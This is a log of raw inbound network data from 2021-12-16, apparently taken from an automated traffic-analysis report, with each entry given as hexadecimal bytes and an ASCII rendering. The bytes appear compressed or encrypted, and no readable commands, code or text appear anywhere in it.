                                                        2021-12-16 12:20:36 UTC117INData Raw: c8 30 4c 8f 18 8c b0 e6 14 15 bf a6 22 85 a9 b9 0e 22 81 f7 60 fe 7b 0b df 98 1f 9b e8 92 36 02 50 4b 3f 53 0a ae 40 e8 e4 b9 30 21 f5 16 12 6c 14 71 24 82 95 ce e0 ee 1d ce 1b 73 06 30 d1 f7 67 00 fe de c7 fe 50 bc b4 cf 8a b9 d0 c2 ca c4 9f 2c 5c 49 f2 ec a7 77 7b ff dd 55 2f 5b b1 b1 8a 6a ec 0f fb de 6f 02 6d da 20 f3 1c b2 d2 b0 6a 30 8e 7d 75 83 31 53 9a b9 74 1a 37 e7 f8 67 95 14 ad f0 15 b6 00 e8 b7 4a 1c d2 23 42 46 0a 38 b9 ca 41 00 f0 c9 37 7e 89 45 ca bc 9a cf e9 e6 5b 86 4b 37 d6 0c 8c 34 ba 3c e3 4a 31 28 fe a0 c5 3d c5 36 52 a2 10 e7 9d 12 30 92 c8 f0 37 13 7f d6 b8 c1 e6 46 49 71 0d bf a6 d0 52 4a 45 ee c5 ee cd 0c 3b a5 a4 1a f2 ce a1 93 5d bc e1 29 a2 ac 95 7d e3 78 0a 5e 47 11 65 96 de b1 98 08 56 1c db 29 b8 33 e6 c1 a8 b7 b0 4f fa df
                                                        Data Ascii: 0L""`{6PK?S@0!lq$s0gP,\Iw{U/[jom j0}u1St7gJ#BF8A7~E[K74<J1(=6R07FIqRJE;])}x^GeV)3O
                                                        2021-12-16 12:20:36 UTC118INData Raw: 4f f7 f5 0a b1 57 b7 fc fc 2d 0a 35 ee fc b6 c7 3a af 0d 32 67 b6 b3 8f 19 dc 73 10 15 83 3d 5a 5c ab a5 db f3 fd 83 6e 09 b4 22 9c 3e 7f 45 f3 c2 9a 86 91 6e 68 0a f6 c7 a2 a2 8e 4c 24 ff e3 b6 ca 13 7d a0 b9 1a 5b 7f 51 0d 9c 61 40 de 5a 51 b1 80 d3 73 84 b5 c8 6e c8 c0 a9 c0 89 68 f3 d6 7f be d8 2b 29 27 3b dc c4 3a b5 75 fe d6 b3 8b 2f 7a 29 1f d3 3e 53 33 a7 21 40 fc a3 e5 e4 8a ec 5c 22 bf 2c 5f ae 04 ca d6 59 52 b1 cd d5 fc b0 c4 47 57 49 60 da 0a dc 31 19 da 95 94 81 c0 a0 2d ce c2 f9 c7 49 f7 fc 16 c5 6c 23 0a 0b 27 e0 e3 dc f3 27 80 98 5b 8f 9a 97 db 35 6a 8a dd 70 56 b0 c4 b8 7a 10 34 cd b8 7c 44 f3 81 6a 44 5d 68 ca ca d9 a9 14 52 a4 ab 6a 3d 0d 4a 3f a3 66 8e b2 3a f1 15 c2 fc 24 df 1e f8 99 46 f2 ba 93 b8 45 ae e8 92 8d e9 69 a2 c4 20 cf 54
                                                        Data Ascii: OW-5:2gs=Z\n">EnhL$}[Qa@ZQsnh+)';:u/z)>S3!@\",_YRGWI`1-Il#''[5jpVz4|DjD]hRj=J?f:$FEi T
                                                        2021-12-16 12:20:36 UTC119INData Raw: 42 c1 84 30 56 a1 ef 0f 80 88 8a 34 88 af c7 84 3c 88 0f 4c d5 5e 03 79 ea 16 9b ec b2 08 11 50 41 35 4c 14 92 4a 6c e6 bf 59 bd 79 11 14 03 8d 65 30 9c b1 45 aa ef 17 ec 50 7a 10 12 9d 2f 65 06 9b 58 d9 f4 45 de 2c de 87 ac c8 2d cf e0 fa ca 55 5e 64 cd 96 6f 7b c4 3e 51 3e 50 b9 2b 73 6b c0 04 f9 c4 69 ca 68 f6 1b ee 0f b9 70 b0 79 3b 8f 97 5c 0c 3b 42 98 b0 e3 22 f8 16 ea 74 9e 03 31 fa 0a af ff fa 84 4b 01 bf 4f 66 43 0e 2b 5b 38 5f 14 e4 c2 05 ce 84 45 d1 99 c5 c7 17 ed 5f 23 5d 35 a7 76 40 35 be 2b 30 4d 13 f9 f8 bf c8 39 45 31 43 af 08 0a bc 2f 0e 86 a5 35 09 13 7b c1 13 a4 44 52 5d 64 33 1e dd 99 59 5e 69 a2 71 c6 f3 1a b6 a8 be 09 fe dd 91 8f 62 54 f6 89 9b 87 c1 63 48 7a 26 4a 42 08 55 cb df 9d 85 1e 05 97 d9 29 ba aa dc dc 7e a0 6b 4b 0e 43 24
                                                        Data Ascii: B0V4<L^yPA5LJlYye0EPz/eXE,-U^do{>Q>P+skihpy;\;B"t1KOfC+[8_E_#]5v@5+0M9E1C/5{DR]d3Y^iqbTcHz&JBU)~kKC$
                                                        2021-12-16 12:20:36 UTC120INData Raw: e6 e3 0b bc 5d 93 ed 7b ff 00 08 ce f2 27 ef 2c b9 f3 39 58 a5 b5 a0 0e 4b 47 cc 05 8d 28 eb 76 91 46 d9 82 66 90 6e 0d c0 1d 8a 3e 75 65 ed ea 83 0b b0 1a 7a 0b 76 90 23 ee 8b 66 3e 92 9f b2 ca b0 77 7d 4f e3 5b 7f 65 33 b8 64 6b 97 49 52 a0 92 05 4a a8 bb c0 dc e3 c2 a9 ca 93 1d c3 fd 4d a1 e3 0a 29 36 34 ed 0b 3b 99 7a d3 35 ab 98 2a 6c b5 31 c4 c0 53 0c bf 3b 7b df a6 f4 e7 b4 36 5d 0e b6 48 bf aa 04 dd c0 57 bd a4 8e 26 d6 b2 e9 93 b3 24 a9 d0 19 f3 65 34 db 95 94 93 e5 88 ca 8c 99 d0 4b 63 f7 fc 0d d6 80 0d 4f 37 9e c7 e7 d6 42 26 db 12 70 8f 9b 82 c4 37 45 a7 6a 67 86 8b e7 b0 51 34 20 ec 48 a6 5c 96 62 76 50 7f 43 c9 c3 d7 9f 9a 57 a4 ab 43 cb 1b 5e 1d 28 85 8c b8 18 45 19 d5 2c 3f fe e7 fe a8 95 dd 79 91 ab 7f bc f4 39 a5 ce 6d 5e c2 36 53 45 78
                                                        Data Ascii: ]{',9XKG(vFfn>uezv#f>w}O[e3dkIRJM)64;z5*l1S;{6]HW&$e4KcO7B&p7EjgQ4 H\bvPCWC^(E,?y9m^6SEx
                                                        2021-12-16 12:20:36 UTC122INData Raw: 4c 83 18 7e b0 e6 18 a1 4b a9 31 82 c6 8c 01 3d 8e 16 45 c1 5d 09 b5 c7 01 97 12 9b 6e 19 68 11 25 45 02 a5 65 7a f1 b9 27 20 67 09 ec 6d 39 62 39 ba e8 72 f9 fd 00 e6 50 64 19 26 40 2b 49 14 e5 c3 a6 b8 42 b1 b0 cf 94 8e df 3e cb ee 86 31 4b 43 71 d7 87 79 78 f0 2e 54 12 50 ac b5 61 76 d3 12 ea cb 6f cb 5e 20 3e c7 1b ae dc df 2b 2e 9b 87 65 a0 13 5e 90 a1 e2 25 db e7 cf 67 8f 14 ad ea 15 88 00 e8 b7 50 0f a3 7e 95 55 04 32 d1 3a 57 00 e1 c1 37 93 85 69 d1 cf 16 c5 17 ed 64 93 46 26 ba 4f 9c 23 a1 3a c7 58 17 29 ed ae c7 41 07 37 43 a5 1e c3 8f 28 3d 9a ac ab 25 04 7b d1 a6 aa 77 b8 48 5c 05 ac d4 88 59 25 ad 62 72 cc 9a 87 3a af b4 11 90 45 b1 9e 49 2d 6c 04 a4 8d cd 7d fe 78 10 5e 47 0b 62 7d 21 9c a3 2a 3c 5c cb 23 a4 6b 3e 37 7c a0 60 37 a6 53 06 04
                                                        Data Ascii: L~K1=E]nh%Eez' gm9b9rPd&@+IB>1KCqyx.TPavo^ >+.e^%gP~U2:W7idF&O#:X)A7C(=%{wH\Y%br:EI-l}x^Gb}!*<\#k>7|`7S
                                                        2021-12-16 12:20:36 UTC123INData Raw: e4 08 b2 25 b6 fb e1 bc fc 18 ec e2 ae ca 2c b4 9c cf 4a b4 a2 92 76 09 69 ee 1e c0 c3 70 5e 86 51 b6 5a b4 82 64 62 27 34 9e 38 62 00 17 df 82 01 d5 90 69 0b 70 98 ac b3 87 09 c6 ed d3 b5 dc db af a2 b9 eb 34 83 41 1b 89 7c 04 4f 58 40 be f7 d3 73 a8 bd d9 0f 10 ce d7 86 90 35 e1 e9 42 8f d7 2c 29 30 2d ce 49 19 9b 70 ec ef b9 89 3a 72 57 32 c6 c0 54 0e b4 28 5f d1 8f f1 e1 9a 3a 73 0c bc 3d 64 40 06 db d9 2c 88 b2 e1 d1 c6 a2 fe f7 7d 0a ac da 0c fe 73 38 da 93 bc 6a c2 a0 27 e1 bf d8 c7 4f e6 ec 15 aa b6 1e 53 25 b0 f1 f3 b9 5e 31 56 1f ae 80 bf be e7 23 6d 0e 79 73 a4 9b c0 b5 5b ec 36 d5 aa b3 8a 8f 79 7b 4e 46 73 f3 b6 2f 76 e8 41 b1 bc 94 cc 1a 5b 20 9a 93 02 05 0f 86 e1 2a d5 2f fc 0f bd 9c 9f f5 90 93 ab 75 fe e8 2d 8d e2 69 5e c4 7e de 42 78 8d
                                                        Data Ascii: %,Jvip^QZdb'48bip4A|OX@s5B,)0-Ip:rW2T(_:s=d@,}s8j'OS%^1V#mys[6y{NFs/vA[ */u-i^~Bx
                                                        2021-12-16 12:20:36 UTC124INData Raw: 9e ce 5b b2 e6 6a 9b a0 ab 2a 83 ae a2 dd 2d ad 21 56 d2 4a 03 a9 c4 14 b3 d4 9a 42 1a 8e 4b 22 6f 02 fb 74 69 e6 b9 36 37 78 11 12 6c 15 7c 31 96 bd 74 e1 ee 17 f6 41 73 06 20 be 2a 64 5a f6 2c cd b8 43 b1 b6 dc 84 db b8 3d cb ec 97 39 29 22 63 c0 83 42 6f ff e0 51 3e bc ae a6 74 63 c1 05 fb d8 86 c1 33 de 3f e9 0d c1 e7 a1 67 2b e6 fd 75 af 3f 40 42 ec e4 36 d2 d0 fa 74 98 1e 94 fe 0b af f4 94 e6 5b 1e ad 64 57 b8 0f 3b 07 28 4a 06 dc fb 2f 6e 0a f2 a6 31 84 c5 13 e5 75 ec dd 34 ad 4b a5 6f bc 2b 33 24 44 3a fb bb cd 38 ca 4d 3c ae 09 1d 9e 45 ae 91 b3 bd 1e fe 79 c0 bb b1 70 b8 48 66 e5 bc d6 9e 7f 67 43 64 fc 71 88 8f 3a af ba 0b fd b5 32 9f 43 46 c8 5e a6 87 cb 1f 6b 6a 07 5a 52 0a 7f 13 5e 9c 8f 0e 2f 2e 58 28 bc b9 79 36 7c a0 60 5d 38 ac 07 18 47
                                                        Data Ascii: [j*-!VJBK"oti67xl|1tAs *dZ,C=9)"cBoQ>tc3?g+u?@B6t[dW;(J/n1u4Ko+3$D:8M<EypHfgCdq:2CF^kjZR^/.X(y6|`]8G
                                                        2021-12-16 12:20:36 UTC125INData Raw: 7f 03 4d b7 ff f3 49 2e 34 e6 c2 a5 df 22 aa db 1e 49 b4 a2 ae 43 a5 f2 ef 14 ab 26 eb 7b ad 4d ff 91 a9 97 71 1e f3 18 9c 3e 73 45 93 a3 1b 0a ba 6a 72 91 53 a6 a9 84 90 79 12 f6 fb 9e c8 b4 7b 8a ef 9f c2 7e 40 1f 94 fe 4e b0 50 66 af 87 01 68 80 96 c8 01 07 ea f3 b4 08 34 e5 fc 51 3d ee 03 22 10 22 da 0a 24 95 58 c7 fe a9 9e 00 20 46 83 c5 c0 56 02 3e 1c 7e f2 85 e9 fe a0 0d 52 26 91 39 4c ad 2e 81 ad da ad b0 e5 c9 4d 97 c2 f7 73 38 b6 91 15 db 75 17 d8 95 92 ab a2 de b4 8f 99 de d8 40 6d d9 3b c9 ba 03 5a 3c ee ff ef fe 69 32 56 13 5a ed e4 0f d1 23 69 1b 60 fd a9 8e cc 93 4e 38 29 a0 bf af 74 b1 71 6a 42 7d 3a b3 5a d0 89 13 4f af 31 67 f2 04 6c 2a 80 9a e3 ab 18 40 1e d5 2c 03 b4 71 65 a9 9f f1 8f 9f 31 50 80 e4 0b 92 e5 76 2c db 3c f6 6f 7a 9f 0f
                                                        Data Ascii: MI.4"IC&{Mq>sEjrSy{~@NPfh4Q=""$X FV>~R&9L.Ms8u@m;Z<i2VZ#i`N8)tqjB}:ZO1gl*@,qe1Pv,<oz
                                                        2021-12-16 12:20:36 UTC127INData Raw: 2f 63 28 c3 33 86 86 b4 02 a8 d9 aa 03 3d 97 03 49 ff 48 09 a2 fa 70 e5 75 9b 42 14 4f 7f be 60 2f b5 4e 76 d2 99 4c 35 78 11 0d 66 3d 48 32 96 bb 47 8a 90 8e e7 41 77 19 0f 24 0f 48 0e d2 cd ed d4 c7 b3 b4 de 99 8e ee 3e cb ee bf 57 2a c7 63 c0 83 77 59 76 f5 78 30 70 b1 90 54 e7 c2 05 ea c2 50 f9 7c de 39 c1 65 c1 4b a0 67 2b 84 b4 ee 8a 16 4c b4 be d3 16 5e fa ee 74 81 3c 91 ff 0a a9 d4 83 e5 c3 1f a9 63 5c 7e 94 08 d4 27 66 1f c8 f6 bc 6f 84 45 c0 99 a8 c7 17 e1 5d fd 23 ac ac 4f 89 2b 87 b1 1c 74 35 1d e4 86 ee b8 ca 36 43 b3 21 34 9e 3e 28 ba d9 c7 af 12 7b c4 ae 8f fe 63 64 7e 3d a2 e7 b9 cf 48 41 60 6f ee d8 0f 3b a9 94 63 81 57 b1 9e 47 5d db 9f 81 aa cf 44 f5 50 27 fd 54 1c 7d 71 f7 b0 8d 0a 2b 7f b4 57 25 bc 51 df 61 9c f0 7d 01 5d 20 11 85 0a
                                                        Data Ascii: /c(3=IHpuBO`/NvL5xf=H2GAw$H>W*cwYvx0pTP|9eKg+L^t<c\~'foE]#O+t56C!4>({cd~=HA`o;cWG]DP'T}q+W%Qa}]
                                                        2021-12-16 12:20:36 UTC128INData Raw: c6 48 b7 fb f4 dc 23 34 ee e4 bb ed 53 c7 6a 32 4b b0 bb e7 83 fe 46 e1 32 b0 5c 51 35 84 46 d9 97 bf aa 43 0f db 33 b4 50 0b f6 c4 dd 86 14 de f4 4d 26 79 ad bc c6 aa 12 3e ec d3 ac ea 9c 50 a2 b9 e7 71 15 3e 82 8e 64 6f 82 3f da 91 b5 23 54 b7 de ea 95 05 c0 a9 d6 b9 18 e7 f8 4b 8d a5 50 b0 37 3e c1 25 5d 03 55 c7 f3 8f 87 4c 5a a2 1e c4 c0 4d 0f 8c 14 51 f9 a5 de 8b e2 8b 5c 0e b8 24 2b 31 21 f6 dd 65 b3 d7 c1 7d d3 b2 ef e7 7d 0b ab da 0c fc 33 44 43 94 94 85 df c8 b7 ab b4 d5 e1 56 9f dc b9 c1 9c 1c 4c 2c 9e cd e1 d6 42 1a 3c 6b e9 8e 9a 92 cf 4a f7 21 47 69 aa bc a9 95 ef 36 36 c4 bb 8c 71 9e 73 6c 6e 39 1a 54 c2 d1 8d 08 3a 3e 8e 6f d0 29 55 5f ab 46 88 b2 30 72 39 fd 07 2b d6 09 d6 c6 e1 6c 91 93 af 6a c6 72 08 a0 e6 4f 41 af 00 36 46 78 9f 16 8f
                                                        Data Ascii: H#4Sj2KF2\Q5FC3PM&y>Pq>do?#TKP7>%]ULZMQ\$+1!e}}3DCVL,B<kJ!Gi66qsln9T:>o)U_F0r9+ljrOA6Fx
                                                        2021-12-16 12:20:36 UTC129INData Raw: de b2 e6 1e a9 e5 ac 31 88 b3 80 2e 3f 88 0f 4b 54 34 90 a5 d0 1a bb 63 9a 42 10 ca 6e 09 57 24 9a e7 69 e6 b9 16 7e 7f 11 12 73 39 4d 1d 94 bd 6b ca 6c 69 7f 40 73 02 1a 2e 2a 65 00 6e f7 f5 e5 65 91 24 de 87 a6 e3 49 cc e8 95 27 7c 73 60 c0 81 42 ed 92 49 54 3e 52 8e 37 74 6b c0 9f cf f7 69 f2 5e 4f 3f eb 0f 9f ab a6 67 2f 81 ab 59 ad 3b 44 b8 23 9a af d1 f8 ea 54 0a 14 bc fd 90 8a d3 f8 bd 7a 8c a9 67 43 66 73 2a f9 29 58 28 dd d4 2d 6b ae c7 a5 28 84 c5 13 c7 e4 97 5d 35 37 6a a0 25 98 0b aa 59 3b 3b db c0 c9 2e c8 2b 6b 82 0b 19 9a 14 ac ee 2a b8 36 17 5b 54 b1 b5 64 dc 6c 5d 0a 9b fd 0d 53 4a 41 40 f4 c1 f5 0d 25 87 93 0b ff c8 9a 1c 3d db e1 05 a0 a7 54 62 ea 6b 9d 7b 7b 0d 5b 48 4a 9d 8f 0a 0d db dd 29 bc aa 79 f6 7c a0 6c 72 ae 2c 9f 0f b9 2e 45
                                                        Data Ascii: 1.?KT4cBnW$i~s9Mkli@s.*ene$I'|s`BIT>R7tki^O?g/Y;D#TzgCfs*)X(-k(]57j%Y;;.+k*6[Tdl]SJA@%=Tbk{{[HJ)y|lr,.E
                                                        2021-12-16 12:20:36 UTC130INData Raw: 61 eb 44 c2 12 3b 3a bc 04 3a e7 68 45 7a 3b fc a4 c1 2d f8 9a 4d 9f 02 78 57 51 60 bb 4b b7 9f 8c fe 09 d6 7c ed 8e 15 1d 50 db bd 87 af f9 0f 4b 4e 61 fa 49 b6 3c bd 17 34 01 c1 38 29 16 72 b6 97 0c c3 d1 2e b0 ba 2c 5c bd 89 d3 ae 3c a6 db 47 0a 00 ff 8c 69 d2 91 c9 2f c0 98 54 6e 85 85 64 85 ee af e6 86 c5 34 33 6a 57 03 bc 6b c6 62 93 67 72 7a a8 cd 29 33 89 90 4f 49 79 6f ab 38 ab 69 a8 21 76 92 4e 1e 89 a0 8b 07 80 a9 a8 18 15 a5 0b 61 d4 60 8b da 49 1f 9b e8 ba eb 10 50 4b be 60 2f ab 4e 49 4f b9 36 37 58 2a 1a 6c 15 7f 18 bb bf 6d e6 c4 95 98 d8 72 06 3e 9e 80 65 00 f4 48 fd d9 52 97 94 74 87 a6 c3 1c f4 e0 95 3d 4a 76 4f c2 87 6e 45 6e ae cc 3f 56 aa 86 df 6b c0 05 70 ff 55 c5 58 fe 94 eb 0f bf f2 e6 6f 2f 9b 9a 5c 82 39 42 94 8b 62 48 49 f9 ee
                                                        Data Ascii: aD;::hEz;-MxWQ`K|PKNaI<48)r.,\<Gi/Tnd43jWkbgrz)3OIyo8i!vNa`IPK`/NIO67X*lmr>eHRt=JvOnEn?VkpUXo/\9BbHI
                                                        2021-12-16 12:20:36 UTC131INData Raw: 6f 6d 14 d3 c7 f6 74 78 2a 5e fb 86 a3 fb 0d a9 5e c1 88 6b f9 91 e7 11 91 2b a6 e9 2a d0 f9 94 29 ad c4 51 24 85 e6 36 5a 8b d0 bb 1d 4c 17 3c 20 60 9c 05 ec 68 a8 c2 aa 52 03 13 64 b5 d9 d8 af ab ba af f9 21 89 37 6e 46 e9 bb e4 c6 6a 07 27 7e 9e 52 3c bf 89 c6 a5 c7 50 e0 b7 6a c4 c9 5b 98 99 25 35 03 ce 19 89 fb 6d fd 4c 6f 9e 78 ea 44 c9 92 c7 4b cd c9 29 9b b2 f9 21 f6 91 26 6f 29 e3 01 9a d6 92 d6 f9 f5 2b d6 ec e4 bd e7 e2 b3 f3 33 54 97 8c a9 1b db 6d c4 92 d1 a6 70 5e 84 66 09 88 b6 82 f4 28 f6 27 b8 1e a5 6f c5 dd a2 09 b1 6e 68 14 53 a3 8e a0 8a 60 10 6a ad 2a cb b4 79 80 68 e1 5b 7f da 3e a2 76 4d bd 8b 40 b4 98 0d 55 a3 bb ca 1e 27 e8 84 c8 91 33 cf 7e 33 3e ca 2e 2d 16 ec c5 3a 3b 03 55 c7 ee 8f b8 f8 7a 38 1a e4 8d 59 1f a4 26 74 d1 8e f6
                                                        Data Ascii: omtx*^^k+*)Q$6ZL< `hRd!7nFj'~R<Pj[%5mLoxDK)!&o)+3Tmp^f('onhS`j*yh[>vM@U'3~3>.-:;Uz8Y&t
                                                        2021-12-16 12:20:36 UTC133INData Raw: ea 44 e6 33 c1 3a bc 1b ad ea 68 56 5c 1d 24 22 bf b4 d9 7a 44 bf a7 6f 7f 7c f8 9e 60 8f 3b d2 c2 08 d6 78 ed 73 1d 1d 50 5e 97 82 93 dd 2f be 64 e7 84 f0 56 31 b9 37 8f 29 ec 3a b3 35 75 26 cf b5 64 d1 2a 90 6e 31 54 bd 13 e9 8a 05 ad f9 b3 0c 2a 79 d2 18 de 91 cd 15 4f b5 56 6e 19 8a cb e9 51 8e 41 82 e5 c1 13 4c 5f 99 99 59 c7 6c 9e 90 72 7c 82 6f bb a7 88 90 51 41 fc 6d ab 3e 1b ce fb a9 51 b2 e2 3e 7f a0 ab 31 12 8c 85 12 1b a8 ff 61 d2 4a 29 54 dd 1e 9b f6 b2 6f 12 50 4d 0e c7 7c 23 69 69 e2 99 c1 37 78 11 88 49 38 74 16 b6 4a 6d e0 ee 37 12 4c 73 06 23 96 07 67 00 f2 f8 5a 8a da b0 b4 da a7 5e c3 3c cb 72 b0 10 45 78 42 38 87 68 6f cc 27 58 3e 56 b3 8e 59 69 c0 03 c0 58 06 4d 7f de 3b cb f6 bf d2 a1 fd 0a b6 92 52 8f c2 42 92 a1 c4 c8 dd f8 ee 69
                                                        Data Ascii: D3:hV\$"zDo|`;xsP^/dV17):5u&d*n1T*yOVnQAL_Ylr|oQAm>Q>1aJ)ToPM|#ii7xI8tJm7Ls#gZ^<rExB8ho'X>VYiXM;RBi
                                                        2021-12-16 12:20:36 UTC134INData Raw: d2 35 18 c3 d6 6d 59 7f 54 61 a3 91 ca 03 a4 45 c0 8e 41 5f 0a 71 10 91 30 96 0d 07 d2 f9 08 26 02 a8 ee 05 49 e2 16 40 aa a8 b1 87 69 25 0e 2e 6d 84 04 ea 42 0e 49 3c 53 03 09 6c 55 db d8 a9 1b 19 fc 72 06 a9 fe 4e 5d e8 9b 7f 56 4f 2a 2a 7a 96 64 3f bf 8f cc de b6 c9 e1 a8 4f cc 2a 59 98 9f 95 96 50 45 3e a9 31 4d e1 4d 4f 23 e8 cf 69 c4 96 cf 7a ce c9 2f 91 2a 97 b8 f7 8e 2b 67 cb e1 01 9c 66 31 85 72 d2 0b 1d cc f9 bc c7 3d 23 d6 1e 59 92 84 99 18 db 6b ce 33 bf 3f 71 41 93 6e f4 8a b6 84 44 8f a5 ac 9f 3e 71 4f db dc 82 0b 20 4b 45 1a 50 ab bd a3 8a 66 1a d6 c3 b3 ca af 55 8d bb e1 5d 55 c6 65 16 65 6b 99 7a 5f b5 98 2d e8 8d 96 d8 27 21 df a8 ca 91 15 da e8 4d a7 d4 21 01 1b 3c c5 3c 11 1b 0e 73 fd a9 9c 0a 5a 39 1a c4 5a 77 32 b5 1f 73 d9 a2 f4 e1
                                                        Data Ascii: 5mYTaEA_q0&I@i%.mBI<SlUrN]VO**zd?O*YPE>1MMO#iz/*+gf1r=#Yk3?qAnD>qO KEPfU]Ueekz_-'!M!<<sZ9Zw2s
                                                        2021-12-16 12:20:36 UTC135INData Raw: 44 f9 3b 1e 38 bc 1d 1d 49 3b de 7b 3d d2 02 ff b5 f9 9a d3 9a 8a 6a 71 71 ba 9f 66 a5 99 7d 4a 09 d6 63 e9 a8 30 1f 50 c2 98 29 fc 62 0e 4d 60 c7 c5 d1 b7 3c 23 12 bf 13 e7 18 f2 32 5f a4 91 d9 74 d1 2e af 89 19 79 bf 89 ca 8d 92 f5 40 46 0c 2e 59 b0 f1 d3 91 57 2a 4a 8a 72 4e 5d a1 49 97 e8 87 53 86 c5 2b 37 64 72 01 bc 72 fc cc c0 fc 73 7c 86 6f 14 ab 88 90 d1 4c fc 7d 8d 18 72 4d 85 30 70 9e f4 1e 89 bf b4 19 a5 ab a8 05 17 0e 77 f8 d3 4a 0d 84 94 1f 9b ec 00 67 3d 42 6d 04 01 03 ba 68 49 ad ab 36 37 67 35 3a 41 17 65 36 bc 3b 13 79 ef 17 e2 61 36 07 3a be b0 40 2d e6 f4 f8 b1 42 b1 b4 fe e8 b4 c3 3c d4 cb bd 10 56 5e 64 ea 01 16 f6 ed d0 51 1e 10 af a6 74 f1 e5 28 f8 fc 58 92 7f de 3f cb 9d ad d2 a1 78 0b b3 ae 76 af 3d 68 14 df 7d 37 d0 fc ce 33 99
                                                        Data Ascii: D;8I;{=jqqf}Jc0P)bM`<#2_t.y@F.YW*JrN]IS+7drrs|oL}rM0pwJg=BmhI67g5:Ae6;ya6:@-B<V^dQt(X?xv=h}73
                                                        2021-12-16 12:20:36 UTC136INData Raw: 34 82 e2 db 65 7e 5f 32 fa 86 bc f8 6e 91 5c c1 93 69 52 ed 7e 16 bb ad f8 bc 2b d0 fd 2e 6b 81 d6 77 9e 6c cb 27 7c 8b cf b0 1d 4c 28 4d 1d 4d 9e 1b c2 6f 2c bc 35 79 81 69 dd 79 d9 dc 8f 59 9e 82 eb 9d 8c d7 7f 60 c9 f3 7e cc 6a 27 62 49 b6 7f 20 97 a2 ee 23 bf e3 63 c9 f7 e5 07 5f b8 f0 be 10 2e 46 1a 84 24 4b dd 25 4e 23 72 ca 26 c3 b0 ef 7c e7 e4 2d b1 32 ad 3a 89 08 23 4f e2 c3 6b 9b 4c b7 61 ce fe 1a 3f cc 8e bc c7 3d 99 95 26 4b b4 be ac 34 d9 6b e8 3e 2d 41 e8 5f 80 42 f9 e3 b7 82 6e 97 fe 18 8f 18 55 04 c4 dd 82 2b d0 7b 68 0b 6d a3 8e a0 8a 60 10 6a ad 2a cb b4 79 80 d5 e0 5b 7f da 3e a2 76 4d bd 36 41 b4 98 0d 1d bd bb ca 1e 0a e8 84 c8 91 33 cf 7e 33 3e ca 2e 2d 16 53 c4 3a 3b 03 55 c7 ee 8f b8 47 7b 38 1a e4 ba 47 1f a4 26 5f d1 8e f6 e1 9a
                                                        Data Ascii: 4e~_2n\iR~+.kwl'|L(MMo,5yiyY`~j'bI #c_.F$K%N#r&|-2:#OkLa?=&K4k>-A_BnU+{hm`j*y[>vM6A3~3>.-S:;UG{8G&_
                                                        2021-12-16 12:20:36 UTC138INData Raw: 7b 12 33 3e 9c 96 36 cf 45 dd 5f 10 c4 04 9f 39 f8 9a 49 9f 21 6f 57 51 e5 97 4e 88 bb ac 5d 23 50 02 54 81 1d 19 70 4a b3 af 82 61 2a 60 76 c1 a4 5e b6 3c b9 17 1d 16 c1 38 ac 20 77 89 b3 2c 63 fb a8 ce 03 30 54 b9 a9 43 a6 14 8b 43 62 21 38 5f d2 7f d2 91 cd 2f c5 8f 54 6e 00 a9 61 ba ca 8f 47 ac 43 4a 8a 4d 5f 07 9c e4 d7 4a be ff 57 51 90 69 77 3a 89 90 4b 49 7a 78 ab 38 2e 42 ad 1d 52 b2 e0 34 0f de 32 30 88 ad 88 92 3c 88 09 fb f7 67 1b 82 f0 8f 9a ec 9a 62 a9 47 4b 24 5a 0e 92 45 6b e6 bf 1c b5 06 88 13 6c 11 45 a2 97 bd 6d 7a cb 3a f7 67 53 94 3b be 2a 45 c5 e3 d2 d8 ed 6b 9c b6 de 81 8c 41 42 52 e9 95 39 74 cd 63 c0 87 f2 4a c1 c1 73 1e c5 af a6 74 4b 08 12 ea da 63 fc 53 dc 3f ed 25 3d ac 38 66 2f 9f a3 e0 ae 3b 42 08 84 c9 27 f6 d8 7a 75 98 14
                                                        Data Ascii: {3>6E_9I!oWQN]#PTpJa*`v^<8 w,c0TCCb!8_/TnaGCJM_JWQiw:KIzx8.BR420<gbGK$ZEklEmz:gS;*EkABR9tcJstKcS?%=8f/;B'zu
                                                        2021-12-16 12:20:36 UTC139INData Raw: 1e ed 74 0a c1 7e 54 ff a6 08 d9 25 84 c6 e4 a3 50 59 cf ca 11 91 2f a6 11 33 d0 f9 12 24 ad d4 77 02 63 64 48 c3 aa a8 b5 3d f9 09 1f 08 d7 bb 28 fb 64 0e 09 32 53 03 37 7e 61 d9 d8 b2 19 b2 80 eb 01 83 78 10 df e8 9b 7b ec dc 06 38 5c 2c 5a 13 ae a9 cc 95 b8 c9 e1 97 2f fd 07 5b 8f b1 92 12 2e da 15 2b 4b f4 fc 4c 4b 03 c5 eb 44 d6 2a ca 4b de ef 0f 06 35 87 b8 d7 d3 3b 4f e6 ff 29 b7 4e b7 fd c1 51 75 80 ed e4 b9 e7 85 b8 f3 33 d1 91 89 95 3f fb d3 ef 14 af 1f 39 47 80 46 c4 a0 9b 80 6e 0b f1 b7 e0 a7 74 6f c1 fd 3b 0a ba 6e f2 2e 5b 9a 85 82 33 67 3a ec f3 fc d3 b4 7d bc 91 cc 59 7f 46 31 0d 1a f2 9c 5a 44 94 22 2c 72 a8 21 ef 2c 10 e6 89 70 90 35 e5 d8 18 be cb 2e 34 1e 13 c7 3a 3d b3 f6 94 65 a8 98 2e 5a 83 1b c4 c0 c8 3a 89 2b 75 d9 18 f5 e1 9c 32
                                                        Data Ascii: t~T%PY/3$wcdH=(d2S7~ax{8\,Z/[.+KLKD*K5;O)NQu3?9GFnto;n.[3g:}YF1ZD",r!,p5.4:=e.Z:+u2
                                                        2021-12-16 12:20:36 UTC140INData Raw: 39 b1 44 25 1a 37 cb 65 9c 7b 3d d6 b8 9a 99 e8 bc 69 64 a6 78 57 71 fe 85 66 a5 ae 84 76 0b d6 7a e7 02 63 84 51 c4 b6 8f 5e fa 0f 4d fe c2 a9 c1 91 1c 65 36 92 01 e1 3d a8 33 5f bc 99 01 67 d1 28 9a 1c 4f cd bc 89 c8 87 c9 8a d9 47 96 0f 54 e0 d6 f3 4c cc 0f 67 b8 53 75 1f a0 56 9c e0 a2 43 86 c3 1e 95 32 c6 02 bc 70 f6 94 bf 65 72 e6 a7 62 45 8c a8 4e 4a 69 d1 4f b9 23 31 4c 9a 20 78 9f e4 1e 8f 8a 2d 4f 11 a8 a8 07 1d 57 08 61 d2 d0 2c 89 c2 38 bb 33 9b 42 10 70 69 3f 45 02 a5 4b 41 cb bb 36 31 52 93 6c f5 14 65 34 b6 5d 6c e0 ee 8d c3 6c 62 20 1a 5e 2b 65 00 d4 97 c3 f4 43 a8 9c f3 85 a6 c5 16 49 96 0c 3c 54 5a 42 21 86 68 6f 76 f5 78 2f 70 8e 47 75 6b c0 25 a2 c1 78 d4 63 f6 